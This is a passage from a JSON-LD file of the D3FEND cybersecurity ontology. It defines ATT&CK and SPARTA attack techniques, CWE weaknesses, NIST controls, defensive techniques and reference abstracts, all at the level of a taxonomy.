      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-02T00:00:00"
      },
      "rdfs:label": "CCI-002423"
    },
    {
      "@id": "d3f:T1422.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1422.002",
      "d3f:definition": "Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems. Adversaries may use Wi-Fi information as part of [Discovery](https://attack.mitre.org/tactics/TA0032) or [Credential Access](https://attack.mitre.org/tactics/TA0031) activity to support both ongoing and future campaigns.",
      "rdfs:label": "Wi-Fi Discovery - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1422"
      },
      "skos:prefLabel": "Wi-Fi Discovery"
    },
    {
      "@id": "d3f:CWE-43",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-43",
      "d3f:definition": "The product accepts path input in the form of multiple trailing dot ('filedir....') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.",
      "rdfs:label": "Path Equivalence: 'filename....' (Multiple Trailing Dot)",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-163"
        },
        {
          "@id": "d3f:CWE-42"
        }
      ]
    },
    {
      "@id": "d3f:CanopyClustering",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-CC",
      "d3f:definition": "The canopy clustering algorithm is an unsupervised pre-clustering algorithm  often used as preprocessing step for the K-means algorithm or the Hierarchical clustering algorithm. It is intended to speed up clustering operations on large data sets.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Canopy clustering algorithm. [Link](https://en.wikipedia.org/wiki/Canopy_clustering_algorithm)",
      "rdfs:label": "Canopy Clustering",
      "rdfs:subClassOf": {
        "@id": "d3f:ClusterAnalysis"
      }
    },
    {
      "@id": "d3f:PER-0003",
      "@type": "owl:Class",
      "d3f:attack-id": "PER-0003",
      "d3f:definition": "The adversary maintains long-lived access by residing within mission ground infrastructure that already has end-to-end reach to the spacecraft. Persistence can exist in operator workstations and mission control software, schedulers/orchestrators, station control (antenna/mount, modem/baseband), automation scripts and procedure libraries, identity and ticketing systems, and cloud-hosted mission services. With this foothold, the actor can repeatedly queue commands, updates, or file transfers during routine passes; mirror legitimate operator behavior to blend in; and refresh their tooling as software is upgraded. Presence on the ground also supports durable reconnaissance (pass plans, dictionaries, key/counter states) and continuous staging so each window to the vehicle can be exploited without re-establishing access.",
      "rdfs:label": "Ground System Presence - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/PER-0003/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAPersistenceTechnique"
      },
      "skos:prefLabel": "Ground System Presence"
    },
    {
      "@id": "d3f:CWE-667",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-667",
      "d3f:definition": "The product does not properly acquire or release a lock on a resource, leading to unexpected resource state changes and behaviors.",
      "rdfs:label": "Improper Locking",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-662"
      }
    },
    {
      "@id": "d3f:DHCPDiscoverEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a DHCP client broadcasts a DISCOVER message to identify available DHCP servers capable of providing IP configuration.",
      "rdfs:label": "DHCP Discover Event",
      "rdfs:subClassOf": {
        "@id": "d3f:DHCPEvent"
      },
      "skos:altLabel": "DHCPDISCOVER"
    },
    {
      "@id": "d3f:WindowsRegistryValueUpdateEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event indicating changes to the data or configuration of an existing registry value within the Windows Registry.",
      "rdfs:label": "Windows Registry Value Update Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:WindowsRegistryValueEvent"
        },
        {
          "@id": "_:Ne4f1957bbd8d44e89ff2521a748b7c5b"
        }
      ]
    },
    {
      "@id": "_:Ne4f1957bbd8d44e89ff2521a748b7c5b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsRegistryValueSetEvent"
      }
    },
    {
      "@id": "d3f:M1038",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:related": [
        {
          "@id": "d3f:DriverLoadIntegrityChecking"
        },
        {
          "@id": "d3f:ExecutableAllowlisting"
        },
        {
          "@id": "d3f:ExecutableDenylisting"
        },
        {
          "@id": "d3f:ProcessSegmentExecutionPrevention"
        }
      ],
      "rdfs:label": "Execution Prevention"
    },
    {
      "@id": "d3f:T1024",
      "@type": "owl:Class",
      "d3f:attack-id": "T1024",
      "d3f:definition": "Adversaries may use a custom cryptographic protocol or algorithm to hide command and control traffic. A simple scheme, such as XOR-ing the plaintext with a fixed key, will produce a very weak ciphertext.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1573",
      "rdfs:label": "Custom Cryptographic Protocol",
      "rdfs:seeAlso": {
        "@id": "d3f:T1573"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:CommandAndControlTechnique"
      }
    },
    {
      "@id": "d3f:Reference-RFC8471TheTokenBindingProtocolVersion1.0",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SpecificationReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://datatracker.ietf.org/doc/html/rfc8471"
      },
      "d3f:kb-abstract": "This document specifies version 1.0 of the Token Binding protocol. The Token Binding protocol allows client/server applications to create long-lived, uniquely identifiable TLS bindings spanning  multiple TLS sessions and connections. Applications are then enabled to cryptographically bind security tokens to the TLS layer, preventing token export and replay attacks.  To protect privacy, the Token Binding identifiers are only conveyed over TLS and can be reset by the user at any time.",
      "d3f:kb-author": "A. Popov, M. Nystroem, Microsoft Corp., D. Balfanz, Google Inc., J Hodges, Kings Mountain Systems",
      "d3f:kb-organization": "IETF",
      "d3f:kb-reference-of": {
        "@id": "d3f:TokenBinding"
      },
      "d3f:kb-reference-title": "RFC8471: The Token Binding Protocol Version 1.0",
      "rdfs:label": "Reference - The Token Binding Protocol Version 1.0"
    },
    {
      "@id": "d3f:T1597",
      "@type": "owl:Class",
      "d3f:attack-id": "T1597",
      "d3f:definition": "Adversaries may search and gather information about victims from closed sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data.(Citation: D3Secutrity CTI Feeds) Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)",
      "rdfs:label": "Search Closed Sources",
      "rdfs:subClassOf": {
        "@id": "d3f:ReconnaissanceTechnique"
      }
    },
    {
      "@id": "d3f:T1567.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1567.001",
      "d3f:definition": "Adversaries may exfiltrate data to a code repository rather than over their primary command and control channel. Code repositories are often accessible via an API (ex: https://api.github.com). Access to these APIs are often over HTTPS, which gives the adversary an additional level of protection.",
      "d3f:may-produce": [
        {
          "@id": "d3f:OutboundInternetEncryptedRemoteTerminalTraffic"
        },
        {
          "@id": "d3f:OutboundInternetEncryptedWebTraffic"
        }
      ],
      "rdfs:label": "Exfiltration to Code Repository",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1567"
        },
        {
          "@id": "_:N749cee0955f14203b60afa53697b3449"
        },
        {
          "@id": "_:Nf7f41a3d7c644a4194bafb195d253768"
        }
      ]
    },
    {
      "@id": "_:N749cee0955f14203b60afa53697b3449",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-produce"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetEncryptedRemoteTerminalTraffic"
      }
    },
    {
      "@id": "_:Nf7f41a3d7c644a4194bafb195d253768",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-produce"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetEncryptedWebTraffic"
      }
    },
    {
      "@id": "d3f:CWE-453",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-453",
      "d3f:definition": "The product, by default, initializes an internal variable with an insecure or less secure value than is possible.",
      "rdfs:label": "Insecure Default Variable Initialization",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1188"
      }
    },
    {
      "@id": "d3f:First-stageBootLoader",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The very first routine run in order to load the operating system.",
      "rdfs:label": "First-stage Boot Loader",
      "rdfs:subClassOf": {
        "@id": "d3f:BootLoader"
      }
    },
    {
      "@id": "d3f:LinuxPtraceArgumentPTRACEINTERRUPT",
      "@type": "owl:Class",
      "d3f:definition": "Stops a tracee.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/ptrace.2.html"
      },
      "rdfs:label": "Linux Ptrace Argument PTRACE_INTERRUPT",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPISuspendProcess"
      }
    },
    {
      "@id": "d3f:CWE-138",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-138",
      "d3f:definition": "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as control elements or syntactic markers when they are sent to a downstream component.",
      "rdfs:label": "Improper Neutralization of Special Elements",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-707"
      }
    },
    {
      "@id": "d3f:ST0004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:SPARTATactic"
      ],
      "d3f:definition": "Threat actor is trying to execute malicious code on the spacecraft.",
      "d3f:display-order": 4,
      "rdfs:label": "Execution - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/tactic/ST0004"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OffensiveTactic"
        },
        {
          "@id": "d3f:SPARTATactic"
        }
      ],
      "skos:prefLabel": "Execution"
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-24",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Access Control Decisions",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "AC-24"
    },
    {
      "@id": "d3f:OTScanTime",
      "@type": "owl:Class",
      "d3f:definition": "An OT controller system variable that tracks the measured time it takes to read input status, apply logic, and write output values.",
      "rdfs:label": "OT Scan Time",
      "rdfs:subClassOf": {
        "@id": "d3f:ApplicationScanTime"
      }
    },
    {
      "@id": "d3f:PER-0001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "PER-0001",
      "d3f:definition": "The adversary arranges for malicious content to survive resets and mode changes by targeting memories and execution paths that initialize the system. Candidates include boot ROM handoff vectors, first/second-stage loaders, non-volatile images (flash/EEPROM), “golden” fallback partitions, configuration words/fuses, and RAM regions reconstructed at start-up from stored files or tables. Persistence may also ride auto-run mechanisms, init scripts, procedure engines, stored command sequences, or event hooks that execute on boot, safe-mode entry/exit, time triggers, or receipt of specific telemetry/commands. Variants keep the core payload only in RAM but ensure it is reloaded after every restart by patching copy-on-boot routines, altering file catalogs, or modifying table loaders so the same bytes are restored. The common thread is control of where the spacecraft looks for what to run next, so unauthorized logic is reinstated whenever the system resets or transitions modes.",
      "d3f:modifies": {
        "@id": "d3f:PrimaryStorage"
      },
      "rdfs:label": "Memory Compromise - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/PER-0001/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SPARTAPersistenceTechnique"
        },
        {
          "@id": "_:Ndf1411b6068a43bd80684836ef6f60df"
        }
      ],
      "skos:prefLabel": "Memory Compromise"
    },
    {
      "@id": "_:Ndf1411b6068a43bd80684836ef6f60df",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PrimaryStorage"
      }
    },
    {
      "@id": "d3f:RestorationEvent",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An event representing actions to return a compromised system or resource to a trusted operational state, such as through backup restoration, system reinstallation, or repair.",
      "d3f:related": {
        "@id": "d3f:Restore"
      },
      "rdfs:label": "Restoration Event",
      "rdfs:subClassOf": {
        "@id": "d3f:SecurityEvent"
      }
    },
    {
      "@id": "d3f:ImpactTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The adversary is trying to manipulate, interrupt, or destroy your systems and data.",
      "d3f:enables": {
        "@id": "d3f:TA0040"
      },
      "rdfs:label": "Impact Technique",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKEnterpriseTechnique"
        },
        {
          "@id": "d3f:OffensiveTechnique"
        },
        {
          "@id": "_:Nc3d21bf5ca00420e976d0be76e50e822"
        }
      ]
    },
    {
      "@id": "_:Nc3d21bf5ca00420e976d0be76e50e822",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0040"
      }
    },
    {
      "@id": "d3f:CWE-638",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-638",
      "d3f:definition": "The product does not perform access checks on a resource every time the resource is accessed by an entity, which can create resultant weaknesses if that entity's rights or privileges change over time.",
      "rdfs:label": "Not Using Complete Mediation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-657"
        },
        {
          "@id": "d3f:CWE-862"
        }
      ]
    },
    {
      "@id": "d3f:CWE-377",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-377",
      "d3f:definition": "Creating and using insecure temporary files can leave application and system data vulnerable to attack.",
      "rdfs:label": "Insecure Temporary File",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-668"
      }
    },
    {
      "@id": "d3f:TraceThread",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "rdfs:label": "Trace Thread",
      "rdfs:subClassOf": {
        "@id": "d3f:SystemCall"
      }
    },
    {
      "@id": "d3f:T1553.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1553.003",
      "d3f:definition": "Adversaries may tamper with SIP and trust provider components to mislead the operating system and application control tools when conducting signature validation checks. In user mode, Windows Authenticode (Citation: Microsoft Authenticode) digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function,  (Citation: Microsoft WinVerifyTrust) which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. (Citation: SpectorOps Subverting Trust Sept 2017)",
      "d3f:modifies": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      },
      "rdfs:label": "SIP and Trust Provider Hijacking",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1553"
        },
        {
          "@id": "_:Ne1e6d2668d4449028f104f7b06002c9c"
        }
      ]
    },
    {
      "@id": "_:Ne1e6d2668d4449028f104f7b06002c9c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      }
    },
    {
      "@id": "d3f:EX-0009.01",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "EX-0009.01",
      "d3f:definition": "Flight software presents rich attack surface where mission-specific parsing and autonomy live. Vulnerable components include command and telemetry handlers, table loaders, file transfer services, mode management and safing logic, payload control applications, and gateway processes that bridge payload and bus protocols. Typical flaws are unchecked lengths and indices in command fields, arithmetic overflows in rate/size calculations, insufficient validation of table contents, format-string misuse in logging, incomplete state cleanup across rapid mode changes, and race conditions in concurrent message processing. Some FSW suites expose operator-facing APIs or scripting/procedure engines used for automation; malformed invocations can coerce unexpected behaviors or enable arbitrary expressions. Because many subsystems act on “last write wins,” logic errors can yield durable configuration changes without obvious anomalies in protocol syntax. Successful exploitation lets an adversary execute code, alter persistent parameters, or chain effects across partitions that would otherwise be segmented by design.",
      "d3f:modifies": {
        "@id": "d3f:Application"
      },
      "rdfs:label": "Flight Software - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0009/01/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:EX-0009"
        },
        {
          "@id": "_:N8bc63f57ca2d477cbc234773ea4ad521"
        }
      ],
      "skos:prefLabel": "Flight Software"
    },
    {
      "@id": "_:N8bc63f57ca2d477cbc234773ea4ad521",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Application"
      }
    },
    {
      "@id": "d3f:ApplicationLayerEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event occurring at the application layer, involving protocols that support application-specific communication.",
      "rdfs:label": "Application Layer Event",
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkEvent"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-3_3",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Access Enforcement | Mandatory Access Control",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "AC-3(3)"
    },
    {
      "@id": "d3f:MailService",
      "@type": "owl:Class",
      "d3f:definition": "A mail service provides the ability to send and receive mail across a computer network.  The mail service runs on message transfer agents (i.e., mail servers) and is accessed by users through an email client.",
      "rdfs:label": "Mail Service",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Email"
        },
        {
          "@id": "dbr:Message_transfer_agent"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkService"
      },
      "skos:altLabel": "Email Service"
    },
    {
      "@id": "d3f:MemoryManagementUnitComponent",
      "@type": "owl:Class",
      "d3f:definition": "A Memory Management Unit Component is a hardware or software element that contributes to the functionality of a Memory Management Unit, which is responsible for managing and translating memory addresses in a computing system.",
      "rdfs:label": "Memory Management Unit Component",
      "rdfs:subClassOf": {
        "@id": "d3f:HardwareDevice"
      }
    },
    {
      "@id": "d3f:Reference-RemoteDesktopLogon_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2016-04-005/"
      },
      "d3f:kb-abstract": "A remote desktop logon, through RDP, may be typical of a system administrator or IT support, but only from select workstations. Monitoring remote desktop logons and comparing to known/approved originating systems can detect lateral movement of an adversary.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:RemoteTerminalSessionDetection"
      },
      "d3f:kb-reference-title": "CAR-2016-04-005: Remote Desktop Logon",
      "rdfs:label": "Reference - CAR-2016-04-005: Remote Desktop Logon - MITRE"
    },
    {
      "@id": "d3f:DS0036",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "A collection of multiple user accounts that share the same access rights to the computer and/or network resources and have common security rights",
      "d3f:exactly": {
        "@id": "d3f:UserGroup"
      },
      "rdfs:comment": "The digital artifact mapping for this data source is only applicable to the Group Metadata component",
      "rdfs:label": "Group (ATT&CK DS)"
    },
    {
      "@id": "d3f:evicts",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x evicts y: The entity x forcibly removes entity y from the environment or resource where y was residing.",
      "rdfs:label": "evicts",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:counters"
        },
        {
          "@id": "d3f:d3fend-tactical-verb-property"
        },
        {
          "@id": "d3f:may-evict"
        }
      ]
    },
    {
      "@id": "d3f:preceded-by",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x preceded-by y: The event or action x occurs after event or action y in time.",
      "owl:inverseOf": {
        "@id": "d3f:precedes"
      },
      "rdfs:isDefinedBy": {
        "@id": "http://purl.obolibrary.org/obo/BFO_0000062"
      },
      "rdfs:label": "preceded-by",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:CWE-103",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-103",
      "d3f:definition": "The product has a validator form that either does not define a validate() method, or defines a validate() method but does not call super.validate().",
      "rdfs:label": "Struts: Incomplete validate() Method Definition",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-573"
      }
    },
    {
      "@id": "d3f:AML.T0021",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0021",
      "d3f:definition": "Adversaries may create accounts with various services for use in targeting, to gain access to resources needed in [AI Attack Staging](/tactics/AML.TA0001), or for victim impersonation.",
      "rdfs:label": "Establish Accounts - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0021"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASResourceDevelopmentTechnique"
      },
      "skos:prefLabel": "Establish Accounts"
    },
    {
      "@id": "d3f:T1547.014",
      "@type": "owl:Class",
      "d3f:attack-id": "T1547.014",
      "d3f:definition": "Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.",
      "rdfs:label": "Active Setup",
      "rdfs:subClassOf": {
        "@id": "d3f:T1547"
      }
    },
    {
      "@id": "d3f:T1547.015",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1547.015",
      "d3f:definition": "Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call <code>SMLoginItemSetEnabled</code>.",
      "d3f:modifies": {
        "@id": "d3f:UserLogonInitResource"
      },
      "rdfs:label": "Login Items",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1547"
        },
        {
          "@id": "_:N1a94e0bd98e14a6682483bd4292b6bac"
        }
      ]
    },
    {
      "@id": "_:N1a94e0bd98e14a6682483bd4292b6bac",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserLogonInitResource"
      }
    },
    {
      "@id": "d3f:NetworkTrafficAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:NetworkTrafficAnalysis"
      ],
      "d3f:d3fend-id": "D3-NTA",
      "d3f:definition": "Analyzing intercepted or summarized computer network traffic to detect unauthorized activity.",
      "d3f:enables": {
        "@id": "d3f:Detect"
      },
      "rdfs:label": "Network Traffic Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefensiveTechnique"
        },
        {
          "@id": "_:N4f1605814933459991e90c9f9f591aad"
        }
      ]
    },
    {
      "@id": "_:N4f1605814933459991e90c9f9f591aad",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Detect"
      }
    },
    {
      "@id": "d3f:SoftwareLibrary",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:SoftwareLibraryFile"
      },
      "d3f:definition": "A software library is a collection of software components that are used to build a software product.",
      "rdfs:label": "Software Library",
      "rdfs:seeAlso": {
        "@id": "https://dbpedia.org/page/Library_(computing)"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Software"
        },
        {
          "@id": "_:N5f9e2d601d6944ecb502aa8637651813"
        }
      ]
    },
    {
      "@id": "_:N5f9e2d601d6944ecb502aa8637651813",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SoftwareLibraryFile"
      }
    },
    {
      "@id": "d3f:BashScriptFile",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExecutableScript"
      ],
      "rdfs:label": "Bash Script File"
    },
    {
      "@id": "d3f:EmailRule",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A configuration of an email application which is used to apply logical or data processing functions to data processed by the email  application.",
      "rdfs:label": "Email Rule",
      "rdfs:subClassOf": {
        "@id": "d3f:ApplicationRule"
      }
    },
    {
      "@id": "d3f:OTReadDeviceConfigurationCommand",
      "@type": "owl:Class",
      "d3f:definition": "Read device configuration.",
      "rdfs:comment": [
        "BACnet: deviceCommunicationControl",
        "GE-SRTP: READ PROGRAM MEMORY"
      ],
      "rdfs:label": "OT Read Device Configuration Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:OTDeviceConfigurationCommand"
      }
    },
    {
      "@id": "d3f:CWE-473",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-473",
      "d3f:definition": "A PHP application does not properly protect against the modification of variables from external sources, such as query parameters or cookies. This can expose the application to numerous weaknesses that would not exist otherwise.",
      "rdfs:label": "PHP External Variable Modification",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-471"
      }
    },
    {
      "@id": "d3f:Reference-CAR-2021-01-003%3AClearingWindowsLogsWithWevtutil_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2021-01-003/"
      },
      "d3f:kb-abstract": "In an attempt to clear traces after compromising a machine, threat actors often try to clear Windows Event logs. This is often done using “wevtutil”, a legitimate tool provided by Microsoft. This action interferes with event collection and notification, and may lead to a security event going undetected, thereby potentially leading to further compromise of the network.",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2021-01-003: Clearing Windows Logs with Wevtutil",
      "rdfs:label": "Reference - CAR-2021-01-003: Clearing Windows Logs with Wevtutil - MITRE"
    },
    {
      "@id": "d3f:TargetAudience",
      "@type": "owl:Class",
      "rdfs:label": "Target Audience",
      "rdfs:subClassOf": {
        "@id": "d3f:AgentGroup"
      }
    },
    {
      "@id": "d3f:CWE-1121",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1121",
      "d3f:definition": "The code contains McCabe cyclomatic complexity that exceeds a desirable maximum.",
      "rdfs:label": "Excessive McCabe Cyclomatic Complexity",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1120"
      }
    },
    {
      "@id": "d3f:IOModule",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An I/O Module is a hardware device that translates signals between external sensors or actuators and control systems. It typically handles analog-to-digital (and vice versa) conversion, serving as the data interface that allows physical processes to be monitored and controlled by digital controllers.",
      "rdfs:label": "I/O Module",
      "rdfs:subClassOf": {
        "@id": "d3f:HardwareDevice"
      }
    },
    {
      "@id": "d3f:Reference-RemotelyLaunchedExecutablesViaServices_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2014-03-005/"
      },
      "d3f:kb-abstract": "There are several ways to cause code to execute on a remote host. One of the most common methods is via the Windows Service Control Manager (SCM), which allows authorized users to remotely create and modify services. Several tools, such as PsExec, use this functionality.\n\nWhen a client remotely communicates with the Service Control Manager, there are two observable behaviors. First, the client connects to the RPC Endpoint Mapper over 135/tcp. This handles authentication, and tells the client what port the endpoint--in this case the SCM--is listening on. Then, the client connects directly to the listening port on services.exe. If the request is to start an existing service with a known command line, the the SCM process will run the corresponding command.\n\nThis compound behavior can be detected by looking for services.exe receiving a network connection and immediately spawning a child process.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:RPCTrafficAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2014-03-005: Remotely Launched Executables via Services",
      "rdfs:label": "Reference - CAR-2014-03-005: Remotely Launched Executables via Services - MITRE"
    },
    {
      "@id": "d3f:Reference-DomainAgeRegistrationAlert_IncRapid7IncRAPID7Inc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20170026400A1/"
      },
      "d3f:kb-abstract": "Systems and methods of identifying a security risk by monitoring and generating alerts based on attempts to access web domains that have been registered within a short period of time and are therefore identified as \"high-risk,\" including identifying an attempt to access a domain; receiving a registration date of the domain; and detecting a security risk based on the registration date of the domain.",
      "d3f:kb-author": "Samuel Adams; H D. Moore",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Rapid7 Inc.",
      "d3f:kb-reference-of": {
        "@id": "d3f:DNSTrafficAnalysis"
      },
      "d3f:kb-reference-title": "Domain age registration alert",
      "rdfs:label": "Reference - Domain age registration alert - Inc Rapid7 Inc RAPID7 Inc"
